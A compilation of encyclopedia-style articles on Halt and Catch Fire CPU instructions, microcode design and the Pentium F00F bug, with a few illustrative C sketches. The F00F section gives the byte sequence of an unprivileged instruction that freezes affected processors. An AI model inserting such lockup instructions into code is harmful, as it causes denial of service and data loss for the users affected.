When this instruction is run the only way to see what it is doing is with an oscilloscope. From the user's point of view the machine halts and defies most attempts to get it restarted. Those persons with indicator lamps on the address bus will see that the processor begins to read all of the memory, sequentially, very quickly. In effect, the address bus turns into a 16 bit counter. However, the processor takes no notice of what it is reading... it just reads.[11]

Another author wrote in 2002:

In the old days of the Motorola 6800 microprocessor, instruction code DD caused the processor to go into an endless loop, reading from each memory address in order. (Other engineers referred to this as the "Halt and Catch Fire" [HCF] instruction, but we remembered the code by calling it the "Drop Dead" instruction.) Drop Dead mode was wonderful for spotting hardware timing and address logic problems with a scope; all of the address and clock lines were nice, cycling square waves.[12]

The 6800's behavior when encountering HCF was known to Motorola by 1976. When the 6800 encounters the HCF instruction, the processor never finds the end of it, endlessly incrementing its program counter until the CPU is reset.[13] Hence, the address bus effectively becomes a counter, allowing the operation of all address lines to be quickly verified. Once the processor enters this mode, it is not responsive to interrupts, so normal operation can only be restored by a reset (hence the "Drop Dead" and "Halt and Catch Fire" monikers). These references are thus to the unresponsive behavior of the CPU in this state, and not to any form of erratic behavior.

Motorola kept the HCF behavior in the 6802 variant of the processor (released in 1977) as an intentional self-test for the 6802's 128 bytes of onboard RAM. Other HCF-like instructions were found later on the Motorola 6800 when executing the undocumented opcodes FD (cycling twice as slowly as 9D/DD) or CD/ED (cycling at a very low, human-observable frequency on a limited number of high-address lines).[14]

HCF is believed to be the first built-in self-test feature on a Motorola microprocessor.[2]

The Intel 8086 and subsequent processors in the x86 series have an HLT (halt) instruction, opcode F4, which stops instruction execution and places the processor in a HALT state. An enabled interrupt, a debug exception, the BINIT signal, the INIT signal, or the RESET signal resumes execution, which means the processor can always be restarted.[15] Some of the early Intel DX4 chips have a problem with the HLT instruction and cannot be restarted after this instruction is used, which disables the computer and turns HLT into more of an HCF instruction. The Linux kernel has a "no-hlt" option telling Linux to run an infinite loop instead of using HLT, which allows users of these broken chips to use Linux.[16]

The 80286 has the undocumented opcode 0F 04, causing the CPU to hang when executed.
The only way out is a CPU reset.[17] In some implementations, the opcode is emulated through BIOS as a halting sequence.[18]

Many computers in the Intel Pentium line can be locked up by executing an invalid instruction (F00F C7C8); this became known as the Pentium F00F bug. No compiler creates the instruction, but a malicious programmer can insert it into code to render an afflicted computer inoperable until the machine is power-cycled. Since its discovery, workarounds have been developed to prevent it from locking the computer, and the bug has been eliminated in subsequent Intel processors.[19][20]

During Black Hat USA 2017, Christopher Domas showed that he had found a new "Halt and Catch Fire" instruction[21][22] on an undisclosed x86 processor model using his own x86 processor fuzzer called sandsifter.[23]

The NMOS MOS Technology 6502 has 12 invalid instructions which cause the program counter to fail to fetch the next instruction, locking up the CPU and requiring a processor reset.[24][25] The WDC version of the CMOS 65C02, as well as the 65C816, has the STP (stop, opcode $DB) instruction. When executed, STP will stop the processor's internal clock, causing all processing to cease; the processor will also be unresponsive to all inputs except RESB (reset). The only way to clear the effects of an STP instruction is to toggle RESB.

On the Zilog Z80, executing DI (disable interrupts) followed by HALT (wait for an interrupt) results in the CPU staying frozen indefinitely, waiting for an interrupt that cannot happen. However, the non-maskable interrupt signal can be used to break out of this state, making this pair not a true HCF.[26][27] The /NMI signal is on pin 17 of the original 40-pin DIP package.[28][29] The pair will only result in an HCF condition if either the /NMI pin is connected directly to the +5V rail, making the generation of that signal impossible, or if the interrupt routine that services /NMI ends with a return, placing the CPU back in the HALT state.

The SM83 processor[a][30] core in the Game Boy's LR35902 system on chip has a similar issue, triggered by two consecutive HALTs with interrupts disabled.[b][31] The core itself contains 11 opcodes that fully lock the CPU when executed.[32]

The Hitachi SC61860, mainly used in Sharp pocket computers in the 1980s and 1990s, has an undocumented HCF instruction with the opcode 7B.[33]
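The 6800's runaway fetch described above is easy to picture with a toy model in C. This is purely illustrative and not derived from Motorola's hardware: once decoding goes astray, the processor keeps fetching and discarding bytes, so the 16-bit address bus simply counts until reset:

  #include <stdint.h>
  #include <stdio.h>

  int main(void) {
      uint16_t address_bus = 0;   /* behaves like a 16-bit counter */
      int reset = 0;              /* stands in for the /RESET pin */
      unsigned long cycle = 0;

      while (!reset) {
          /* a memory read would occur here; the result is ignored */
          printf("fetch at %04X\n", address_bus);
          address_bus++;          /* wraps from 0xFFFF back to 0x0000 */
          if (++cycle == 8)       /* artificial stop so the demo ends */
              reset = 1;
      }
      return 0;
  }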
https://en.wikipedia.org/wiki/Halt_and_Catch_Fire_(computing)
In processor design, microcode serves as an intermediary layer situated between the central processing unit (CPU) hardware and the programmer-visible instruction set architecture of a computer, also known as its machine code.[1] It consists of a set of hardware-level instructions that implement the higher-level machine code instructions or control internal finite-state machine sequencing in many digital processing components. While microcode is utilized in Intel and AMD general-purpose CPUs in contemporary desktops and laptops, it functions only as a fallback path for scenarios that the faster hardwired control unit is unable to manage.[2]

Housed in special high-speed memory, microcode translates machine instructions, state machine data, or other input into sequences of detailed circuit-level operations. It separates the machine instructions from the underlying electronics, thereby enabling greater flexibility in designing and altering instructions. Moreover, it facilitates the construction of complex multi-step instructions, while simultaneously reducing the complexity of computer circuits. The act of writing microcode is often referred to as microprogramming, and the microcode in a specific processor implementation is sometimes termed a microprogram.

Through extensive microprogramming, microarchitectures of smaller scale and simplicity can emulate more robust architectures with wider word lengths, additional execution units, and so forth. This approach provides a relatively straightforward method of ensuring software compatibility between different products within a processor family.

Some hardware vendors, notably IBM and Lenovo, use the term microcode interchangeably with firmware. In this context, all code within a device is termed microcode, whether it is microcode or machine code. For instance, updates to a hard disk drive's microcode often encompass updates to both its microcode and firmware.[3]

At the hardware level, processors contain a number of separate areas of circuitry, or "units", that perform different tasks. Commonly found units include the arithmetic logic unit (ALU), which performs instructions such as addition or comparing two numbers, circuits for reading and writing data to external memory, and small areas of onboard memory to store these values while they are being processed. In most designs, additional high-performance memory, the register file, is used to store temporary values, not just those needed by the current instruction.[4]

To properly perform an instruction, the various circuits have to be activated in order. For instance, it is not possible to add two numbers if they have not yet been loaded from memory. In RISC designs, the proper ordering of these instructions is largely up to the programmer, or at least to the compiler of the programming language they are using. So to add two numbers, for instance, the compiler may output instructions to load one of the values into one register, the second into another, call the addition function in the ALU, and then write the result back out to memory.[4]

As the sequence of instructions needed to complete this higher-level concept, "add these two numbers in memory", may require multiple instructions, this can represent a performance bottleneck if those instructions are stored in main memory. Reading those instructions one by one takes up time that could be used to read and write the actual data. For this reason, it is common for non-RISC designs to have many different instructions that differ largely in where they store data.
For instance, the MOS 6502 has eight variations of the addition instruction, ADC, which differ only in where they look to find the two operands.[5] Using the variation of the instruction, or "opcode", that most closely matches the ultimate operation can reduce the number of instructions to one, saving memory used by the program code and improving performance by leaving the data bus open for other operations. Internally, however, these instructions are not separate operations, but sequences of the operations the units actually perform. Converting a single instruction read from memory into the sequence of internal actions is the duty of the control unit, another unit within the processor.[6]

The basic idea behind microcode is to replace the custom hardware logic implementing the instruction sequencing with a series of simple instructions run in a "microcode engine" in the processor. Whereas a custom logic system might have a series of diodes and gates that output a series of voltages on various control lines, the microcode engine is connected to these lines instead, and these are turned on and off as the engine reads the microcode instructions in sequence. The microcode instructions are often bit-encoded to those lines; for instance, if bit 8 is true, that might mean that the ALU should be paused awaiting data. In this respect microcode is somewhat similar to the paper rolls in a player piano, where the holes represent which key should be pressed.

The distinction between custom logic and microcode may seem small: one uses a pattern of diodes and gates to decode the instruction and produce a sequence of signals, whereas the other encodes the signals as microinstructions that are read in sequence to produce the same results. The critical difference is that in a custom logic design, changes to the individual steps require the hardware to be redesigned. Using microcode, all that changes is the code stored in the memory containing the microcode. This makes it much easier to fix problems in a microcode system. It also means that there is no effective limit to the complexity of the instructions; they are limited only by the amount of memory one is willing to use. A sketch of such an engine appears below.
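A rough sketch of this idea in C; the control-line assignments are invented for illustration, and a real engine drives hardware lines rather than testing flags:

  #include <stdint.h>

  /* Each 16-bit control word directly drives control lines (horizontal
     style). Bit 8 is the "ALU wait" line, echoing the example above. */
  enum {
      CTL_MEM_READ  = 1 << 0,
      CTL_MEM_WRITE = 1 << 1,
      CTL_ALU_ADD   = 1 << 2,
      CTL_REG_LOAD  = 1 << 3,
      CTL_ALU_WAIT  = 1 << 8,
  };

  static const uint16_t control_store[] = {
      CTL_MEM_READ,                 /* fetch an operand */
      CTL_ALU_ADD | CTL_REG_LOAD,   /* add and latch the result */
      CTL_MEM_WRITE,                /* store the result */
  };

  void run_microprogram(void) {
      for (unsigned upc = 0;
           upc < sizeof control_store / sizeof control_store[0]; upc++) {
          uint16_t word = control_store[upc];
          if (word & CTL_MEM_READ)  { /* raise the memory-read line */ }
          if (word & CTL_ALU_ADD)   { /* select the ALU add function */ }
          if (word & CTL_REG_LOAD)  { /* clock the destination register */ }
          if (word & CTL_MEM_WRITE) { /* raise the memory-write line */ }
      }
  }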
The lowest layer in a computer's software stack is traditionally raw machine code instructions for the processor. In microcoded processors, fetching and decoding those instructions, and executing them, may be done by microcode. To avoid confusion, each microprogram-related element is differentiated by the micro prefix: microinstruction, microassembler, microprogrammer, etc.[7]

Complex digital processors may also employ more than one (possibly microcode-based) control unit in order to delegate sub-tasks that must be performed essentially asynchronously in parallel. For example, the VAX 9000 has a hardwired IBox unit to fetch and decode instructions, which it hands to a microcoded EBox unit to be executed,[8] and the VAX 8800 has both a microcoded IBox and a microcoded EBox.[9]

A high-level programmer, or even an assembly language programmer, does not normally see or change microcode. Unlike machine code, which often retains some backward compatibility among different processors in a family, microcode only runs on the exact electronic circuitry for which it is designed, as it constitutes an inherent part of the particular processor design itself.

Engineers normally write the microcode during the design phase of a processor, storing it in a read-only memory (ROM) or programmable logic array (PLA)[10] structure, or in a combination of both.[11] However, machines also exist that have some or all microcode stored in static random-access memory (SRAM) or flash memory. This is traditionally denoted as writable control store in the context of computers, which can be either read-only or read-write memory. In the latter case, the CPU initialization process loads microcode into the control store from another storage medium, with the possibility of altering the microcode to correct bugs in the instruction set, or to implement new machine instructions.

Microprograms consist of series of microinstructions, which control the CPU at a very fundamental level of hardware circuitry. For example, a single typical horizontal microinstruction might simultaneously specify which registers feed the two sides of the ALU, which operation the ALU performs, which register receives the result, whether the condition codes are updated, and the address of the next microinstruction. To simultaneously control all of the processor's features in one cycle, the microinstruction is often wider than 50 bits; e.g., 128 bits on a 360/85 with an emulator feature. Microprograms are carefully designed and optimized for the fastest possible execution, as a slow microprogram would result in a slow machine instruction and degraded performance for related application programs that use such instructions.

Microcode was originally developed as a simpler method of developing the control logic for a computer. Initially, CPU instruction sets were hardwired. Each step needed to fetch, decode, and execute the machine instructions (including any operand address calculations, reads, and writes) was controlled directly by combinational logic and rather minimal sequential state machine circuitry. While such hard-wired processors were very efficient, the need for powerful instruction sets with multi-step addressing and complex operations (see below) made them difficult to design and debug; highly encoded and varied-length instructions can contribute to this as well, especially when very irregular encodings are used.

Microcode simplified the job by allowing much of the processor's behaviour and programming model to be defined via microprogram routines rather than by dedicated circuitry. Even late in the design process, microcode could easily be changed, whereas hard-wired CPU designs were very cumbersome to change. Thus, this greatly facilitated CPU design.

From the 1940s to the late 1970s, a large portion of programming was done in assembly language; higher-level instructions mean greater programmer productivity, so an important advantage of microcode was the relative ease by which powerful machine instructions can be defined. The ultimate extension of this are "directly executable high level language" designs, in which each statement of a high-level language such as PL/I is entirely and directly executed by microcode, without compilation. The IBM Future Systems project and Data General Fountainhead Processor are examples of this. During the 1970s, CPU speeds grew more quickly than memory speeds and numerous techniques such as memory block transfer, memory pre-fetch and multi-level caches were used to alleviate this. High-level machine instructions, made possible by microcode, helped further, as fewer, more complex machine instructions require less memory bandwidth. For example, an operation on a character string can be done as a single machine instruction, thus avoiding multiple instruction fetches.
Architectures with instruction sets implemented by complex microprograms included the IBM System/360 and Digital Equipment Corporation VAX. The approach of increasingly complex microcode-implemented instruction sets was later called complex instruction set computer (CISC). An alternate approach, used in many microprocessors, is to use one or more programmable logic array (PLA) or read-only memory (ROM) structures (instead of combinational logic) mainly for instruction decoding, and let a simple state machine (without much, or any, microcode) do most of the sequencing. The MOS Technology 6502 is an example of a microprocessor using a PLA for instruction decode and sequencing. The PLA is visible in photomicrographs of the chip,[12] and its operation can be seen in the transistor-level simulation.

Microprogramming is still used in modern CPU designs. In some cases, after the microcode is debugged in simulation, logic functions are substituted for the control store. Logic functions are often faster and less expensive than the equivalent microprogram memory.

A processor's microprograms operate on a more primitive, totally different, and much more hardware-oriented architecture than the assembly instructions visible to normal programmers. In coordination with the hardware, the microcode implements the programmer-visible architecture. The underlying hardware need not have a fixed relationship to the visible architecture. This makes it easier to implement a given instruction set architecture on a wide variety of underlying hardware micro-architectures.

The IBM System/360 has a 32-bit architecture with 16 general-purpose registers, but most of the System/360 implementations use hardware that implements a much simpler underlying microarchitecture; for example, the System/360 Model 30 has 8-bit data paths to the arithmetic logic unit (ALU) and main memory and implemented the general-purpose registers in a special unit of higher-speed core memory, and the System/360 Model 40 has 8-bit data paths to the ALU and 16-bit data paths to main memory and also implemented the general-purpose registers in a special unit of higher-speed core memory. The Model 50 has full 32-bit data paths and implements the general-purpose registers in a special unit of higher-speed core memory.[13] The Model 65 through the Model 195 have larger data paths and implement the general-purpose registers in faster transistor circuits. In this way, microprogramming enabled IBM to design many System/360 models with substantially different hardware and spanning a wide range of cost and performance, while making them all architecturally compatible. This dramatically reduces the number of unique system software programs that must be written for each model.

A similar approach was used by Digital Equipment Corporation (DEC) in their VAX family of computers. As a result, different VAX processors use different microarchitectures, yet the programmer-visible architecture does not change.

Microprogramming also reduces the cost of field changes to correct defects (bugs) in the processor; a bug can often be fixed by replacing a portion of the microprogram rather than by changes being made to hardware logic and wiring.

In 1947, the design of the MIT Whirlwind introduced the concept of a control store as a way to simplify computer design and move beyond ad hoc methods.
The control store is a diode matrix: a two-dimensional lattice, where one dimension accepts "control time pulses" from the CPU's internal clock, and the other connects to control signals on gates and other circuits. A "pulse distributor" takes the pulses generated by the CPU clock and breaks them up into eight separate time pulses, each of which activates a different row of the lattice. When the row is activated, it activates the control signals connected to it.[14]

In 1951, Maurice Wilkes[15] enhanced this concept by adding conditional execution, a concept akin to a conditional in computer software. His initial implementation consisted of a pair of matrices: the first one generated signals in the manner of the Whirlwind control store, while the second matrix selected which row of signals (the microprogram instruction word, so to speak) to invoke on the next cycle. Conditionals were implemented by providing a way that a single line in the control store could choose from alternatives in the second matrix. This made the control signals conditional on the detected internal signal. Wilkes coined the term microprogramming to describe this feature and distinguish it from a simple control store. A miniature model of this scheme appears below.
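Wilkes's two-matrix scheme can be modeled in miniature in C; the row contents and dimensions here are invented. Matrix A holds the control signals for each row, while matrix B holds two candidate successor rows, selected by an internal condition signal:

  #include <stdint.h>

  #define ROWS 4

  /* Matrix A: the control signals driven when each row is activated. */
  static const uint8_t matrix_a[ROWS] = { 0x01, 0x06, 0x18, 0x20 };

  /* Matrix B: two candidate next rows per row; an internal condition
     signal picks between them, giving conditional execution. */
  static const uint8_t next_row[ROWS][2] = { {1, 1}, {2, 3}, {0, 0}, {0, 0} };

  uint8_t step(uint8_t row, int condition) {
      uint8_t signals = matrix_a[row];   /* drive these control lines */
      (void)signals;                     /* (a real machine acts on them) */
      return next_row[row][condition ? 1 : 0];   /* matrix B selection */
  }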
Microcode remained relatively rare in computer design, as the cost of the ROM needed to store the code was not significantly different from the cost of custom control logic. This changed through the early 1960s with the introduction of mass-produced core memory and core rope, which was far less expensive than dedicated logic based on diode arrays or similar solutions. The first to take real advantage of this was IBM in their 1964 System/360 series. This allowed the machines to have a very complex instruction set, including operations that matched high-level language constructs like formatting binary values as decimal strings, encoding the complex series of internal steps needed for this task in low-cost memory.[16]

But the real value in the 360 line was that one could build a series of machines that were completely different internally, yet run the same ISA. For a low-end machine, one might use an 8-bit ALU that requires multiple cycles to complete a single 32-bit addition, while a higher-end machine might have a full 32-bit ALU that performs the same addition in a single cycle. These differences could be implemented in control logic, but the cost of implementing a completely different decoder for each machine would be prohibitive. Using microcode meant all that changed was the code in the ROM. For instance, one machine might include a floating point unit, and thus its microcode for multiplying two numbers might be only a few lines long, whereas on the same machine without the FPU this would be a program that did the same using multiple additions; all that changed was the ROM.[16]

The outcome of this design was that customers could use a low-end model of the family to develop their software, knowing that if more performance was ever needed, they could move to a faster version and nothing else would change. This lowered the barrier to entry, and the 360 was a runaway success. By the end of the decade, the use of microcode was de rigueur across the mainframe industry.

Early minicomputers were far too simple to require microcode, and were more similar to earlier mainframes in terms of their instruction sets and the way they were decoded. But it was not long before their designers began using more powerful integrated circuits that allowed for more complex ISAs. By the mid-1970s, most new minicomputers and superminicomputers were using microcode as well, such as most models of the PDP-11 and, most notably, most models of the VAX, which included high-level instructions not unlike those found in the 360.[17]

The same basic evolution occurred with microprocessors as well. Early designs were extremely simple, and even the more powerful 8-bit designs of the mid-1970s like the Zilog Z80 had instruction sets that were simple enough to be implemented in dedicated logic. By this time, the control logic could be patterned onto the same die as the CPU, making the difference in cost between ROM and logic less of an issue. However, it was not long before these companies were also facing the problem of introducing higher-performance designs while still wanting to offer backward compatibility. Among early examples of microcode in micros was the Intel 8086.[6]

Among the ultimate implementations of microcode in microprocessors is the Motorola 68000. This offered a highly orthogonal instruction set with a wide variety of addressing modes, all implemented in microcode. This did not come without cost: according to early articles, about 20% of the chip's surface area (and thus cost) was the microcode system,[18] accounting for a corresponding share of the system's 68,000 transistors.

While companies continued to compete on the complexity of their instruction sets, and the use of microcode to implement these was unquestioned, in the mid-1970s an internal project at IBM was raising serious questions about the entire concept. As part of a project to develop a high-performance all-digital telephone switch, a team led by John Cocke began examining huge volumes of performance data from their customers' 360 (and System/370) programs. This led them to notice a curious pattern: when the ISA presented multiple versions of an instruction, the compiler almost always used the simplest one, instead of the one most directly representing the code. They learned that this was because those instructions were always implemented in hardware, and thus ran the fastest. Using the other instruction might offer higher performance on some machines, but there was no way to know what machine the code was running on. This defeated the purpose of using microcode in the first place, which was to hide these distinctions.[19]

The team came to a radical conclusion: "Imposing microcode between a computer and its users imposes an expensive overhead in performing the most frequently executed instructions."[19]

The result of this discovery was what is today known as the RISC concept. The complex microcode engine and its associated ROM is reduced or eliminated completely, and those circuits are instead dedicated to things like additional registers or a wider ALU, which increase the performance of every program. When complex sequences of instructions are needed, this is left to the compiler, which is the entire purpose of using a compiler in the first place. The basic concept was soon picked up by university researchers in California, where simulations suggested such designs would trivially outperform even the fastest conventional designs. It was one such project, at the University of California, Berkeley, that introduced the term RISC.
The industry responded to the concept of RISC with both confusion and hostility, including a famous dismissive article by the VAX team at Digital.[20] A major point of contention was that implementing the instructions outside of the processor meant it would spend much more time reading those instructions from memory, thereby slowing overall performance no matter how fast the CPU itself ran.[20] Proponents pointed out that simulations clearly showed the number of instructions was not much greater, especially when considering compiled code.[19]

The debate raged until the first commercial RISC designs emerged in the second half of the 1980s, which easily outperformed the most complex designs from other companies. By the late 1980s it was over; even DEC was abandoning microcode for their DEC Alpha designs, and CISC processors switched to using hardwired circuitry, rather than microcode, to perform many functions. For example, the Intel 80486 uses hardwired circuitry to fetch and decode instructions, using microcode only to execute instructions; register-register move and arithmetic instructions require only one microinstruction, allowing them to be completed in one clock cycle.[21] The Pentium Pro's fetch and decode hardware fetches instructions and decodes them into series of micro-operations that are passed on to the execution unit, which schedules and executes the micro-operations, possibly doing so out-of-order. Complex instructions are implemented by microcode that consists of predefined sequences of micro-operations.[22]

Some processor designs use machine code that runs in a special mode, with special instructions, available only in that mode, that have access to processor-dependent hardware, to implement some low-level features of the instruction set. The DEC Alpha, a pure RISC design, used PALcode to implement features such as translation lookaside buffer (TLB) miss handling and interrupt handling,[23] as well as providing, for Alpha-based systems running OpenVMS, instructions requiring interlocked memory access that are similar to instructions provided by the VAX architecture.[23] CMOS IBM System/390 CPUs, starting with the G4 processor, and z/Architecture CPUs use millicode to implement some instructions.[24]

Each microinstruction in a microprogram provides the bits that control the functional elements that internally compose a CPU. The advantage over a hard-wired CPU is that internal CPU control becomes a specialized form of a computer program. Microcode thus transforms a complex electronic design challenge (the control of a CPU) into a less complex programming challenge. To take advantage of this, a CPU is divided into several parts, such as a microsequencer that selects the next word from the control store, a register set, and an arithmetic and logic unit. There may also be a memory address register and a memory data register, used to access the main computer storage. Together, these elements form an "execution unit". Most modern CPUs have several execution units. Even simple computers usually have one unit to read and write memory, and another to execute user code. These elements could often be brought together as a single chip. This chip comes in a fixed width that forms a "slice" through the execution unit. These are known as "bit slice" chips. The AMD Am2900 family is one of the best known examples of bit slice elements.[39] The parts of the execution units and the whole execution units are interconnected by a bundle of wires called a bus.

Programmers develop microprograms using basic software tools. A microassembler allows a programmer to define the table of bits symbolically.
Because of its close relationship to the underlying architecture, "microcode has several properties that make it difficult to generate using a compiler."[1] A simulator program is intended to execute the bits in the same way as the electronics, and allows much more freedom to debug the microprogram. After the microprogram is finalized, and extensively tested, it is sometimes used as the input to a computer program that constructs logic to produce the same data. This program is similar to those used to optimize a programmable logic array. Even without fully optimal logic, heuristically optimized logic can vastly reduce the number of transistors from the number needed for a read-only memory (ROM) control store. This reduces the cost to produce, and the electricity used by, a CPU.

Microcode can be characterized as horizontal or vertical, referring primarily to whether each microinstruction controls CPU elements with little or no decoding (horizontal microcode)[a] or requires extensive decoding by combinatorial logic before doing so (vertical microcode). Consequently, each horizontal microinstruction is wider (contains more bits) and occupies more storage space than a vertical microinstruction.

"Horizontal microcode has several discrete micro-operations that are combined in a single microinstruction for simultaneous operation."[1] Horizontal microcode is typically contained in a fairly wide control store; it is not uncommon for each word to be 108 bits or more. On each tick of a sequencer clock a microcode word is read, decoded, and used to control the functional elements that make up the CPU.

In a typical implementation a horizontal microprogram word comprises fairly tightly defined groups of bits. For example, one simple arrangement might be fields for register source A, register source B, the destination register, the ALU operation, the type of jump, and the jump address. For this type of micromachine to implement a JUMP instruction with the address following the opcode, the microcode might require two clock ticks: one to read the jump target from the word following the opcode into a temporary register, and a second to load that value into the program counter (a sketch of such a microprogram appears below).

For each tick it is common to find that only some portions of the CPU are used, with the remaining groups of bits in the microinstruction being no-ops. With careful design of hardware and microcode, this property can be exploited to parallelise operations that use different areas of the CPU; for example, in the case above, the ALU is not required during the first tick, so it could potentially be used to complete an earlier arithmetic instruction.
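The sketch promised above, written in C rather than a real microassembler; the field widths and encodings are invented. It shows a horizontal microword with the fields just listed, and a two-tick microprogram for the JUMP instruction:

  #include <stdint.h>

  /* Hypothetical horizontal microword matching the field layout above. */
  struct microword {
      uint8_t  src_a, src_b, dest;  /* register-file selects            */
      uint8_t  alu_op;              /* 0 = pass, 1 = add (invented)     */
      uint8_t  jump_type;           /* 0 = next, 1 = always (invented)  */
      uint16_t jump_addr;           /* next micro-address if taken      */
      uint8_t  mem_read, pc_load;   /* discrete control lines           */
  };

  /* Two ticks implementing a machine-level JUMP whose target follows
     the opcode in memory. */
  static const struct microword jump_ucode[2] = {
      /* tick 1: address bus <- PC; read the target into temp register 7 */
      { .src_a = 0 /* PC */, .dest = 7, .alu_op = 0, .mem_read = 1 },
      /* tick 2: PC <- temp; then jump back to the instruction-fetch loop */
      { .src_a = 7, .pc_load = 1, .jump_type = 1, .jump_addr = 0 },
  };

Note how every field not named in a given tick is simply zero, i.e. a no-op, which is exactly the slack the following paragraph describes exploiting for parallelism.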
In vertical microcode, each microinstruction is significantly encoded; that is, the bit fields generally pass through intermediate combinatory logic that, in turn, generates the control and sequencing signals for internal CPU elements (ALU, registers, etc.). This is in contrast with horizontal microcode, in which the bit fields either directly produce the control and sequencing signals or are only minimally encoded. Consequently, vertical microcode requires smaller instruction lengths and less storage, but requires more time to decode, resulting in a slower CPU clock.[40]

Some vertical microcode is just the assembly language of a simple conventional computer that is emulating a more complex computer. Some processors, such as DEC Alpha processors and the CMOS microprocessors on later IBM mainframes System/390 and z/Architecture, use machine code, running in a special mode that gives it access to special instructions, special registers, and other hardware resources unavailable to regular machine code, to implement some instructions and other functions,[41][42] such as page table walks on Alpha processors.[43] This is called PALcode on Alpha processors and millicode on IBM mainframe processors.

Another form of vertical microcode has two fields, a field select and a field value. The field select selects which part of the CPU will be controlled by this word of the control store. The field value controls that part of the CPU. With this type of microcode, a designer explicitly chooses to make a slower CPU to save money by reducing the unused bits in the control store; however, the reduced complexity may increase the CPU's clock frequency, which lessens the effect of an increased number of cycles per instruction.

As transistors grew cheaper, horizontal microcode came to dominate the design of CPUs using microcode, with vertical microcode being used less often. When both vertical and horizontal microcode are used, the horizontal microcode may be referred to as nanocode or picocode.[44]

A few computers were built using writable microcode. In this design, rather than storing the microcode in ROM or hard-wired logic, the microcode is stored in a RAM called a writable control store or WCS. Such a computer is sometimes called a writable instruction set computer (WISC).[45] Many experimental prototype computers use writable control stores; there are also commercial machines that use writable microcode, such as the Burroughs Small Systems, early Xerox workstations, the DEC VAX 8800 (Nautilus) family, the Symbolics L- and G-machines, a number of IBM System/360 and System/370 implementations, some DEC PDP-10 machines,[46] and the Data General Eclipse MV/8000.[47]

The IBM System/370 includes a facility called Initial-Microprogram Load (IML or IMPL)[48] that can be invoked from the console, as part of power-on reset (POR), or from another processor in a tightly coupled multiprocessor complex. Some commercial machines, for example the IBM 360/85,[49][50] have both a read-only storage and a writable control store for microcode.

WCS offers several advantages, including the ease of patching the microprogram and, for certain hardware generations, faster access than ROMs can provide. User-programmable WCS allows the user to optimize the machine for specific purposes.

Starting with the Pentium Pro in 1995, several x86 CPUs have writable Intel Microcode.[51][52] This, for example, has allowed bugs in the Intel Core 2 and Intel Xeon microcodes to be fixed by patching their microprograms, rather than requiring the entire chips to be replaced. A second prominent example is the set of microcode patches that Intel offered for some of its processor architectures of up to 10 years in age, in a bid to counter the security vulnerabilities discovered in their designs (Spectre and Meltdown) which went public at the start of 2018.[53][54] A microcode update can be installed by Linux,[55] FreeBSD,[56] Microsoft Windows,[57] or the motherboard BIOS.[58]

Some machines offer user-programmable writable control stores as an option, including the HP 2100, DEC PDP-11/60, TI-990/12,[59][60] and Varian Data Machines V-70 series minicomputers.

The design trend toward heavily microcoded processors with complex instructions began in the early 1960s and continued until roughly the mid-1980s.
At that point the RISC design philosophy started becoming more prominent.

A CPU that uses microcode generally takes several clock cycles to execute a single instruction, one clock cycle for each step in the microprogram for that instruction. Some CISC processors include instructions that can take a very long time to execute. Such variations interfere with both interrupt latency and, what is far more important in modern systems, pipelining. When designing a new processor, a hardwired control RISC has advantages over microcoded CISC, though there are counterpoints as well.

Many RISC and VLIW processors are designed to execute every instruction (as long as it is in the cache) in a single cycle. This is very similar to the way CPUs with microcode execute one microinstruction per cycle. VLIW processors have instructions that behave similarly to very wide horizontal microcode, although typically without such fine-grained control over the hardware as provided by microcode. RISC instructions are sometimes similar to the narrow vertical microcode.

Microcode has been popular in application-specific processors such as network processors, digital signal processors, channel controllers, disk controllers, network interface controllers, flash memory controllers, graphics processing units, and other hardware.

Modern CISC implementations, such as the x86 family starting with the NexGen Nx586, Intel Pentium Pro, and AMD K5, decode instructions into dynamically buffered micro-operations with an instruction encoding similar to RISC or traditional microcode. A hardwired instruction decode unit directly emits micro-operations for common x86 instructions, but falls back to a more traditional microcode ROM containing micro-operations for more complex or rarely used instructions.[2] For example, an x86 might look up micro-operations from microcode to handle complex multistep operations such as loop or string instructions, floating-point unit transcendental functions or unusual values such as denormal numbers, and special-purpose instructions such as CPUID.
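Returning to the two-field vertical encoding described earlier, a minimal decode sketch in C (field numbering and meanings are invented); the switch plays the role of the intermediate combinatory logic, which is exactly the extra decoding step that narrows the word but slows the clock:

  #include <stdint.h>

  enum field { F_ALU_OP = 0, F_REG_SEL = 1, F_MEM_CTL = 2 };

  /* A vertical microinstruction: which part of the CPU to control,
     and the value to apply to it. */
  struct vword { uint8_t field_select; uint8_t field_value; };

  void decode(struct vword w) {
      switch (w.field_select) {
      case F_ALU_OP:  /* route w.field_value to the ALU function lines */ break;
      case F_REG_SEL: /* route w.field_value to the register selects   */ break;
      case F_MEM_CTL: /* route w.field_value to memory control lines   */ break;
      }
  }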
https://en.wikipedia.org/wiki/Microcode
The Pentium F00F bug is a design flaw in the majority of Intel Pentium, Pentium MMX, and Pentium OverDrive processors (all in the P5 microarchitecture). Discovered in 1997, it can result in the processor ceasing to function until the computer is physically rebooted. The bug has been circumvented through operating system updates. The name is shorthand for F0 0F C7 C8, the hexadecimal encoding of one offending instruction.[1] More formally, the bug is called the invalid operand with locked CMPXCHG8B instruction bug.[2]

In the x86 architecture, the byte sequence F0 0F C7 C8 represents the instruction lock cmpxchg8b eax (locked compare and exchange of 8 bytes in register EAX). The bug also applies to opcodes ending in C9 through CF, which specify register operands other than EAX. The F0 0F C7 C8 instruction does not require any special privileges.

This instruction encoding is invalid. The cmpxchg8b instruction compares the value in the EDX and EAX registers with an 8-byte value in a memory location. In this case, however, a register is specified instead of a memory location, which is not allowed. Under normal circumstances, this would simply result in an exception; however, when used with the lock prefix (normally used to prevent two processors from interfering with the same memory location), the CPU erroneously uses locked bus cycles to read the illegal-instruction exception-handler descriptor. Locked reads must be paired with locked writes, and the CPU's bus interface enforces this by forbidding other memory accesses until the corresponding writes occur. As none are forthcoming, after performing these bus cycles all CPU activity stops, and the CPU must be reset to recover.

Due to the proliferation of Intel microprocessors, the existence of this unprivileged instruction was considered a serious issue at the time. Operating system vendors responded by implementing workarounds that detected the condition and prevented the crash.[3] Information about the bug first appeared on the Internet on or around 8 November 1997.[4] Since the F00F bug has become common knowledge, the term is sometimes used to describe similar hardware design flaws such as the Cyrix coma bug.

No permanent hardware damage results from executing the F00F instruction on a vulnerable system; it simply locks up until rebooted. However, loss of unsaved data is likely if the disk buffers have not been flushed, if drives were interrupted during a write operation, or if some other non-atomic operation was interrupted.

The B2 stepping solved this issue for Intel's Pentium processors.[2]

The F00F instruction can be considered an example of a Halt and Catch Fire (HCF) instruction.

